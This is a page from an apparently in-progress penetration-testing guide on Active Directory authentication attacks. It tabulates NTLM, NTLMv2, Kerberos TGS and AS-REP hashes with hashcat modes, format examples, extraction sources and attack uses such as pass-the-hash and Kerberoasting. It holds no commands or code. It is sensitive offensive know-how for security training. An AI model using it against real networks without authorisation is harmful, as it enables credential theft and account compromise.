This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Authentication Attacks

Important: It's important to understand the environment before launching any attacks, bringing down a critical service could cause major issues for the organization (and for you). 😅

Hash Types in Active Directory Environments

Hash Type Reference Table

Hash Type
Hashcat Mode
Format Example
Source/Extraction
Primary Use Case

NTLM

1000

31d6cfe0d16ae931b73c59d7e0c089c0

secretsdump, SAM/NTDS

Pass-the-hash, local authentication

NTLMv2

5600

user::domain:challenge:response:blob

Network capture, Responder

Challenge-response auth, credential theft

Kerberos TGS

13100

$krb5tgs$23$*user$DOMAIN$service*$hash

Kerberoasting attacks

Service account password recovery

AS-REP

18200

$krb5asrep$23$user@DOMAIN:hash

AS-REP roasting

User accounts without pre-auth

NTLM Hash (Mode 1000)

Purpose: Legacy Windows password hash stored in SAM database and NTDS.dit

Structure: MD4 hash of the Unicode password (32 hexadecimal characters)

Weakness: Fast to crack due to weak hashing algorithm, no salt

Attack Value: Enables pass-the-hash attacks without knowing plaintext password

NTLMv2 Hash (Mode 5600)

Purpose: Challenge-response authentication hash for network protocols

Structure: HMAC-MD5 of username, domain, server challenge, and client response

Weakness: Can be captured through LLMNR/NBT-NS poisoning or man-in-the-middle attacks

Attack Value: Provides cleartext password when cracked, works across network authentication

Kerberos TGS Hash (Mode 13100)

Purpose: Service ticket encrypted with service account password

Structure: Kerberos ticket encrypted using RC4-HMAC or AES encryption

Weakness: Service accounts often have weak passwords and don't change frequently

Attack Value: Service accounts typically have elevated privileges for applications/databases

AS-REP Hash (Mode 18200)

Purpose: Authentication Server response for accounts without Kerberos pre-authentication

Structure: Encrypted timestamp using user's password hash

Weakness: Accounts configured with "Do not require Kerberos pre-authentication"

Attack Value: Direct user account compromise, often legacy compatibility setting

PreviousActive Directory EnumerationNextNon-Authenticated (External) Attacks

Last updated

Was this helpful?